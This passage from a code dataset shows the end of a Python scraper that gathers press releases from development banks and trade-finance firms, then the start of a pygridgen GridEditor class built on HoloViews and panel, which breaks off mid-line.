loop_len_of_titles(titles,info,links,dt,'http://www.whiteoaksf.com/','cmorris07@googlemail.com')\n \n \ndef kuke():\n main_url = 'http://www.kuke.com.pl/en/news/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n #find_all article elements\n articles = soup.find_all('article',{'class':'news-item'})\n #loop through all article elements\n for items in articles:\n #find div with class date, append to dates list\n date_div = items.find('div',{'class':'date'})\n dates.append(date_div.text.strip())\n #append main_url (prefix) to h2 anchor element href\n links.append(main_url + items.h2.a['href'])\n #append h2 text to titles list\n titles.append(items.h2.text.strip())\n #find div with class desc, append text to info list\n desc_div = items.find('div',{'class':'desc'})\n info.append(desc_div.text.strip())\n \n #parse dates into datetime objects\n dates = [datetime.datetime.strptime(x,\"%d.%m.%Y\") for x in dates]\n \n #call function\n loop_len_of_titles(titles,info,links,dates,main_url,'cmorris07@googlemail.com')\n \n \ndef ifc():\n main_url = 'http://www.ifc.org/wps/wcm/connect/news_ext_content/ifc_external_corporate_site/news+and+events/news'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n prefix = 'http://www.ifc.org'\n articles = soup.find_all('div',{'class':'pressroom-item'})\n \n for items in articles:\n date_div = items.find('div',{'class':'pressroom-item-date'})\n dates.append(date_div.text.strip())\n link_div = items.find('div',{'class':'pressroom-item-link'})\n links.append(prefix + link_div.a['href'])\n titles.append(link_div.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%b %d, %Y\") for x in dates]\n \n 
loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n\n \ndef ebrd():\n main_url = 'http://www.ebrd.com/news.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n articles = soup.find_all('div',{'class':'news-post'})\n for items in articles:\n dates.append(items.div.dt.text)\n links.append(items.a['href'])\n titles.append(items.a['title'].strip())\n info.append(items.div.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d.%m.%y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.ebrd.com','cmorris07@googlemail.com')\n \n \n\ndef nib():\n main_url = 'https://www.nib.int/news_publications'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n\n articles = soup.find_all('div',{'class':'articles_article'})\n for items in articles:\n titles.append(items.h2.text.strip())\n links.append(items.h2.a['href'])\n dates.append(items.span.text.strip())\n info.append(items.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d %b %Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'https://www.nib.int','cmorris07@googlemail.com')\n \n\ndef nexi():\n main_url = 'http://www.nexi.go.jp/en/topics/index.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.nexi.go.jp/en/topics/'\n articles = soup.find('ul',{'id':'topicsTab'})\n li_elems = articles.find_all('li')\n \n for items in li_elems:\n links.append(prefix + items.h3.a['href'].strip())\n dates.append(items.div.text.strip())\n titles.append(items.h3.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find_all('div',{'class':'cont'})\n p_elem = div_container[1].p.extract()\n info.append(p_elem.text.strip())\n \n \n dates = [datetime.datetime.strptime(x,\"%b %d,%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.nexi.go.jp/en/index.html','cmorris07@googlemail.com')\n \n \ndef natixis():\n main_url = 'https://www.natixis.com/natixis/jcms/tki_5065/en/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.natixis.com/natixis/'\n article_container = soup.find('div',{'id':'ydu_52785'})\n articles = article_container.find_all('div',{'class':'article'})\n \n for items in articles:\n date_regex = re.compile(r'[0-9]{2}/[0-9]{2}/[0-9]{4}')\n mo = date_regex.search(items.h3.text.strip())\n if mo is not None:\n dates.append(mo.group())\n titles.append(items.h3.text.strip())\n links.append(prefix + items.h3.a['href'].strip())\n if items.p:\n info.append(items.p.text.strip())\n else:\n info.append('')\n \n \n dates = [datetime.datetime.strptime(x,\"%d/%m/%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'https://www.natixis.com/','cmorris07@googlemail.com')\n \n \ndef sompo():\n main_url = 'http://www.sompocanopius.com/news/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n article_container = soup.find('div',{'class':'module_download_file'})\n articles = article_container.find_all('li')\n \n for items in articles:\n date_regex = re.compile(r'[0-9]{2}_[0-9]{2}_[0-9]{4}')\n mo = date_regex.search(items.a['href'])\n if mo is not None:\n dates.append(mo.group())\n links.append(items.a['href'].strip())\n titles.append(items.a.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%d_%m_%Y\") for x in dates]\n \n \n 
loop_len_of_titles(titles,info,links,dates,'http://www.sompocanopius.com/','cmorris07@googlemail.com')\n \n\n\ndef cdb():\n main_url = 'http://www.cdb.com.cn/English/xwzx_715/khdt/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n article_container = soup.find('div',{'class':'ld_xwzxlb_Box'})\n article_container.find('div',{'class':'ld_xwzxlb_Boxc'}).extract()\n top_article = article_container.find('div',{'class':'ld_xwzxlb_Boxa'})\n prefix = 'http://www.cdb.com.cn/English/xwzx_715/khdt'\n links.append(prefix + top_article.h2.a['href'].lstrip('.'))\n \n li_elems = article_container.find_all('li')\n \n for a_elem in li_elems:\n links.append(prefix + a_elem.a['href'].lstrip('.'))\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find('div',{'class':'ld_xl_Box'})\n date_regex = re.compile(r'[0-9]{4}-[0-9]{2}-[0-9]{2}')\n mo = date_regex.search(div_container.find('span').text.strip())\n if mo is not None:\n dates.append(mo.group())\n else:\n dates.append('')\n info.append(div_container.find('p').text.strip())\n titles.append(div_container.h1.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%Y-%m-%d\") for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,'http://www.cdb.com.cn/English/','cmorris07@googlemail.com')\n \n\ndef soc_gen():\n main_url = 'https://www.societegenerale.com/en/s-informer-et-nous-suivre/newsroom/all-press_releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.societegenerale.com'\n articles = soup.find_all('li',{'class':'press-release'})\n \n for items in articles:\n \n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n dates.append(items.span.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%d/%m/%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \ndef veb(): \n main_url = 'http://www.veb.ru/en/press/index.php?&from_20=1'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.veb.ru'\n articles = soup.find_all('article',{'class':'news-short__item'})\n \n for items in articles:\n \n dates.append(items.time.text.strip())\n titles.append(items.p.a.text.strip())\n links.append(prefix + items.p.a['href'])\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('article')\n info.append(p_elem.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d.%m.%Y\") for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef trafigura(): \n\n\n main_url = 'https://www.trafigura.com/resource-centre?category=Press+Releases'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n \n prefix = 'https://www.trafigura.com'\n article_container = soup.find('div',{'id':'mediasearch-list'})\n articles = article_container.find_all('figure')\n \n for items in articles:\n titles.append(items.find('span',{'class':'title'}).text.strip())\n links.append(prefix + items.a['href'].strip())\n items.p.span.extract()\n dates.append(items.p.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('div',{'class':'full-text'})\n info.append(p_elem.p.text.strip())\n \n \n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates] \n \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n 
\n \n \ndef sace(): \n main_url = 'http://www.sace.it/en/media/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.sace.it/en/media/'\n articles = soup.find_all('div',{'class':'cal-list-item'})\n \n for items in articles:\n info.append(items.find('div',{'class':'text'}).text.strip())\n date_regex = re.compile(r'[0-9]+\\s[A-Za-z]+\\s[0-9]{4}')\n mo = date_regex.search(items.find('div',{'class':'sub-title'}).text.strip())\n if mo is not None:\n dates.append(mo.group())\n else:\n dates.append('')\n titles.append(items.h3.text.strip())\n \n links.append(prefix + items.a['href'])\n \n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates] \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n###############################################################################\n#Selenium/PhantomJS functions (also use Beautiful soup)\n###############################################################################\ndef miga():\n main_url = 'https://www.miga.org/news'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n prefix = 'https://www.miga.org'\n \n articles = soup.find_all('ul',{'class':'pressRe'})\n for items in articles:\n\n titles.append(items.a.text)\n links.append(prefix + items.a['href'])\n date_div = items.find('span',{'class':'date'})\n dates.append(date_div.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%B %d,%Y\") for x in dates]\n \n for link in links:\n r = webdriver.PhantomJS()\n r.get(link)\n sopa = BeautifulSoup(r.page_source,'lxml')\n div_container = sopa.find('div',{'id':'copy'})\n p_elem = div_container.find_all('p')\n info.append(p_elem[2].text.strip())\n #quit each PhantomJS instance so headless browser processes are not leaked\n r.quit()\n \n\n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n\n\ndef cdc():\n\n main_url = 'http://www.cdcgroup.com/Media/News/'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n \n prefix = 'http://www.cdcgroup.com'\n articles = soup.find('ul',{'class':'page-list'})\n li_elems = articles.find_all('li')\n \n for items in li_elems:\n dates.append(items.span.text.strip())\n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n info.append(items.p.text.strip())\n\n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.cdcgroup.com/','cmorris07@googlemail.com')\n \n\n \n\n \n \n \n \n \n \n\n \ndef run_funcs(): \n \n \n #hold references to the scrapers; each is called below inside try/except\n #so that one failing source does not stop the rest\n func_list = [\n adbNews,\n dsConceptNews,\n googleAlerts,\n falconGroup,\n thaiExim,\n russianDIF,\n misysScraper,\n baswareScraper,\n swiftScraper,\n cofaceScraper,\n whiteAndCaseScraper,\n capitalBusinessCreditScraper,\n kuke,\n ifc,\n miga,\n xl,\n eib,\n ebrd,\n nib,\n cdc,\n nexi,\n jbic,\n natixis,\n euler_hermes,\n sompo,\n cdb,\n db,\n soc_gen,\n clydeco,\n veb,\n trafigura,\n glencore,\n sace\n ] \n #func_list = [adbNews,ebrd]\n \n for func in func_list:\n try:\n func()\n except Exception as e:\n print(func.__name__ + ' failed: ' + str(e))\n \nrun_funcs()", "sub_path": "web_scraper.py", "file_name": "web_scraper.py", "file_ext": "py", "file_size_in_byte": 35256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pymysql.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "db.connection_properties", "line_number": 17, "usage_type": "name"}, 
{"api_name": "pymysql.cursors", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "langdetect.detect", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 125, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 127, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 143, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 143, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 145, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 155, "usage_type": "call"}, {"api_name": "langdetect.detect", "line_number": 166, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 204, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 242, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 249, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 249, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 256, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 256, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 262, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 268, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 268, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 311, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 320, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 320, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 338, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 353, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 353, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 374, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 374, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 381, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 410, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 411, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 416, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 416, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 438, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 441, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 442, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 465, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 471, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 471, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 492, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 492, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 526, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 526, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 545, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 550, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 550, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 583, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 583, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 585, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 614, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 614, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 634, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 634, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 650, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 650, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 667, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 667, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 686, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 687, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 693, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 693, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 707, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 719, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 719, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 732, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 740, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 740, "usage_type": "attribute"}, {"api_name": 
"requests.get", "line_number": 763, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 764, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 766, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 775, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 775, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 795, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 795, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 815, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 816, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 820, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 820, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 843, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 844, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 849, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 849, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 865, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 875, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 875, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 895, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 898, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 898, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 900, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 924, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 924, "usage_type": "attribute"}]}
+{"seq_id": "281959752", "text": "import numpy as np\nimport pandas as pd\nfrom io import BytesIO\n\nimport param\nimport geopandas\nimport holoviews as hv\nimport geoviews as gv\nimport panel as pn\nimport pygridgen as pgg\n\nfrom holoviews.plotting.bokeh.callbacks import Link, LinkCallback\n\n\nclass PolaritySwap(Link):\n \"\"\"\n Link to be applied to a Points object with a polarity column to\n allow toggling of the polarity (beta) value client-side.\n \"\"\"\n _requires_target = False\n\n\nclass PolarityCallback(LinkCallback):\n \"\"\"\n Client side JavaScript to toggle the node polarity (beta) value of\n nodes tapped using the Tap tool\n \"\"\"\n source_model = 'selected'\n on_source_changes = ['indices']\n source_handles = ['cds', 'draw_tool']\n source_code = \"\"\"\n if (source_draw_tool.active) { return }\n var index = source_selected.indices[0]\n if (index == undefined)\n return\n var polarity = source_cds.get_column('color')\n if (polarity[index] == '+')\n polarity[index] = '0'\n else if (polarity[index] == '0')\n polarity[index] = '-'\n else\n polarity[index] = '+'\n source_cds.data['color'] = polarity\n source_cds.data['polarity'] = polarity\n source_selected.indices = []\n source_cds.properties.data.change.emit()\n source_cds.change.emit()\n \"\"\"\n\n\n# Registering Link callback\ncallbacks = Link._callbacks['bokeh']\ncallbacks[PolaritySwap] = PolarityCallback\n\n\n# Dictionary of possible tile sources to make available via the background dropdown menu\nTILE_SOURCES = {k:v.opts(global_extent=True)\n for k,v in gv.tile_sources.tile_sources.items()}\nTILE_SOURCES['None'] = None\n\n\nclass GridEditor(param.Parameterized):\n \"\"\"\n Interactive boundary editor for previewing and generating pygridgen grids.\n\n Core features:\n * Add, drag and delete nodes interactively with the PointsDraw tool\n * Toggle their polarity (beta) value with the Tap Tool\n * Insert nodes into selected edges after selecting them with the Tap Tool.\n * Set a focus function and update the grid\n * Pythonic access to the geopandas boundary DataFrame.\n * Serializable state to capture editor state between sessions\n * Customizable background tile sources or background tile elements.\n\n For more information please visit https://github.com/pygridgen/hologridgen\n \"\"\"\n\n # Algorithmic parameters hidden from the GUI\n\n max_nodes = param.Integer(default=1000, precedence=-1,\n doc = \"Maximum number of nodes in a boundary\")\n\n ul_idx=param.Integer(default=0, precedence=-1,\n doc='Upper left index: parameter of grid generation')\n\n polarity_value = param.Dict(default={'+':1, '0':0, '-':-1}, precedence=-1, doc=\"\"\"\n Beta values to associate with the three node polarities (positive\n '+', neutral '0' and negative '-'). 
Setting '+':4/3 for instance\n enables grid generation with only three positive nodes.\"\"\")\n\n # Parameters not in the GUI for Pythonic data access\n\n focus = param.ClassSelector(default=None, class_=pgg.Focus,\n allow_None=True, precedence=-1, doc=\"\"\"\n Parameter that can be set to a pygridgen Focus object (or None).\n When set, mesh generation will apply the specified Focus\n function.\"\"\")\n\n grid = param.ClassSelector(default=None, class_=pgg.grid.Gridgen,\n allow_None=True, precedence=-1, doc=\"\"\"\n Parameter that exposes the pygridgen Gridgen object that will be\n set after mesh generation.\"\"\")\n\n ready = param.Boolean(default=False, precedence=-1, doc=\"\"\"\n Boolean predicate indicating readiness for mesh generation: mesh generation\n can be executed when the sum of the polarity in the boundary is 4.\"\"\")\n\n # User settings hidden from the GUI, settable in the constructor (precedence= -1)\n\n width = param.Integer(default=600, precedence=-1, bounds=(200, 1000),\n doc=\"Width of the HoloViews object corresponding to the editor view area\")\n\n height = param.Integer(default=600, precedence=-1, bounds=(200, 1000),\n doc=\"Height of the HoloViews object corresponding to the editor view area\")\n\n custom_background = param.Parameter(default=None, precedence=-1, doc=\"\"\"\n Custom HoloViews element to use as the background when the\n background parameter is set to 'Custom'.\"\"\")\n\n background = param.ObjectSelector('None', objects=TILE_SOURCES.keys(), doc=\"\"\"\n Selector of available default tile sources which can also be set\n to 'None' for no background or 'Custom' in which case the\n HoloViews/GeoViews element set in the custom_background parameter\n (if any) is used as the background.\"\"\")\n\n # Customizable HoloViews styles (hidden from the GUI, settable in the constructor)\n\n node_style = param.Dict(dict(cmap={'+': 'red', '-': 'blue', '0':'black'}),\n precedence=-1, doc=\"\"\"\n Style options for nodes. Note that the size is overridden by the\n node_size param controllable in the GUI and the polarity colors\n can be changed by setting the cmap dictionary.\"\"\")\n\n mesh_style = param.Dict(dict(line_width=2, line_alpha=1, line_color='blue'),\n precedence=-1, doc=\"Style options for displayed mesh.\")\n\n\n edge_style = param.Dict(dict(line_width=2, line_alpha=1, line_color='green',\n nonselection_color='green', nonselection_alpha=0.5),\n precedence=-1, doc=\"\"\"\n Style options for displayed boundary edges. The nonselection_*\n options set how deselected edges appear when the Tap tool is used\n to insert new nodes into edges.\"\"\")\n\n start_indicator_style = param.Dict(\n dict(marker='triangle', angle=30, fill_alpha=0, size=30, color='black'),\n precedence=-1, doc=\"\"\"\n Style of the start marker indicating the first boundary\n point. 
Default is a triangle that can be rotated by setting the\n 'angle' keyword.\"\"\")\n\n # GUI controllable parameters\n\n node_size = param.Integer(default=10, bounds=(1,200),\n doc=\"Size of nodes used to mark the boundary.\")\n\n edge_width = param.Integer(default=2, bounds=(1,50), doc=\"Width of the boundary edges\")\n\n xres = param.Integer(default=50, bounds=(2, None), doc=\"\"\"\n X resolution of the generated grid\"\"\")\n\n yres = param.Integer(default=50, bounds=(2, None), doc=\"\"\"\n Y resolution of the generated grid\"\"\")\n\n generate_mesh = param.Event(doc='Event that runs mesh generation')\n\n hide_mesh = param.Event(doc='Event that clears displayed mesh')\n\n insert_points = param.Event(\n doc='Event that inserts a new node into an edge selected with the Tap tool')\n\n _columns = ['color', 'polarity', 'x', 'y']\n\n\n def __init__(self, data=None, **params):\n data_params = {} if data is None else {k:v for k,v in data.items()\n if k not in self._columns}\n params = dict(data_params, **params)\n data = {k:[] for k in self._columns} if (data is None) else data\n super().__init__(**params)\n\n def install_handle(plot, element):\n \"Handle needed to make the draw_tool available in the JS callback\"\n plot.handles['draw_tool'] = plot.state.tools[-1]\n\n node_style = dict(self.node_style,\n tools=['tap'],\n color=hv.dim('polarity'),\n fill_alpha=hv.dim('polarity').categorize({'0':0, '+':1, '-':1 }),\n show_legend=False, hooks=[install_handle])\n\n # PointDraw Stream that enables the PointDraw Bokeh tool\n self._node_stream = hv.streams.PointDraw(data=data,\n num_objects=self.max_nodes,\n empty_value = '+')\n\n # Nodes is a DynamicMap returning hv.Points along the boundary\n self.nodes = hv.DynamicMap(self.points,\n streams=[self._node_stream,\n self.param.insert_points,\n self.param.node_size]).opts(**node_style)\n # DynamicMap drawing the boundary as a hv.Path element\n self.boundary_dmap = hv.DynamicMap(self._boundary,\n streams=[self._node_stream,\n hv.streams.Selection1D()])\n # DynamicMap placing the start indicator\n self.start_marker = hv.DynamicMap(self._start_marker,\n streams=[self._node_stream]\n ).opts(**self.start_indicator_style)\n\n # Initial, empty mesh\n self.qmesh = hv.QuadMesh((np.zeros((2,2)), np.zeros((2,2)), np.zeros((2,2))))\n\n self._selected_edge_index = None\n\n @classmethod\n def from_geopandas(cls, df):\n \"\"\"\n Classmethod that allows a GridEditor to be initialized from a\n boundary geopandas DataFrame (such as the one available from the\n .boundary property).\n \"\"\"\n if len(df) == 0:\n return GridEditor()\n allowed = [el for el in cls._columns if el != 'geometry']\n color_vals = {v:k for k,v in cls.polarity_value.items()}\n data = {k:list(v) for k,v in df.to_dict(orient='list').items() if k in allowed}\n data['color'] = [color_vals[p] for p in data['polarity']]\n data['polarity'] = data['color']\n return GridEditor(data)\n\n @property\n def boundary(self):\n \"Property returning the boundary GeoDataFrame\"\n exclude = ['color', 'fill_alpha']\n data = self._node_stream.data\n polarity = [self.polarity_value[c] for c in data['color']]\n df_data = {c:[el for el in v] for c,v in data.items() if c not in exclude}\n df_data['polarity'] = polarity\n df = pd.DataFrame(df_data)\n return geopandas.GeoDataFrame(df, geometry=geopandas.points_from_xy(df.x, df.y))\n\n\n @property\n def data(self, exclude=['name', 'fill_alpha', 'grid']):\n \"\"\"\n Property exposing serializable state of the editor that can be\n passed into the GridEditor constructor to restore 
that state\n \"\"\"\n data = {k:[el for el in v] for k,v in self._node_stream.data.items()}\n param_data = {p:getattr(self, p) for p in self.param}\n data.update(param_data)\n return {k:v for k,v in data.items() if k not in exclude}\n\n def _ready(self):\n \"Predicate method indicating current readiness for mesh generation\"\n data = self._node_stream.data\n\n if len(data['x']) > 3:\n summed = sum(self.polarity_value[el] for el in data['color'])\n return (summed == 4)\n else:\n return False\n\n\n @pn.depends('ready', watch=True)\n def _check_readiness(self):\n \"Callback used to disable generate mesh button till ready\"\n for widget in self.widgets:\n if isinstance(widget, pn.widgets.button.Button) and (widget.name == 'Generate mesh'):\n button = widget\n break\n button.disabled = not self.ready\n\n\n @pn.depends('_node_stream.data')\n def _geojson(self):\n \"Callback to generate GeoJSON file when download button is clicked\"\n boundary = self.boundary\n bio = BytesIO()\n if len(boundary) != 0:\n boundary.to_file(bio, driver='GeoJSON')\n bio.seek(0)\n return bio\n\n # DynamicMap callbacks\n\n def points(self, data, insert_points, node_size):\n \"DynamicMap callback returns Points representing boundary nodes\"\n new_data = {'x': data['x'], 'y': data['y'],\n 'polarity' : np.array(data['color'], dtype='U1')}\n if insert_points and len(self._selected_edge_index)==1:\n point_index = self._selected_edge_index[0] + 1\n sx, ex = new_data['x'][point_index-1], new_data['x'][point_index]\n sy, ey = new_data['y'][point_index-1], new_data['y'][point_index]\n\n new_data['x'] = np.insert(new_data['x'], point_index, (sx+ex) / 2.)\n new_data['y'] = np.insert(new_data['y'], point_index, (sy+ey) / 2.)\n new_data['polarity'] = np.insert(new_data['polarity'], point_index, '+')\n return hv.Points(new_data, vdims=['polarity']).opts(size=node_size)\n\n\n def _generate_mesh(self, generate_mesh=False, hide_mesh=False):\n \"Callback returning generated QuadMesh element\"\n if not self.ready:\n return self.qmesh.opts(fill_alpha=0, line_alpha=0)\n\n elif hide_mesh or (not generate_mesh):\n return self.qmesh.opts(fill_alpha=0, line_alpha=0)\n\n if self.ready:\n gdf = self.boundary\n kwargs = dict(shape=(self.xres, self.yres), ul_idx=self.ul_idx)\n if self.focus is not None:\n kwargs['focus'] = self.focus\n self.grid = pgg.Gridgen(gdf.geometry.x, 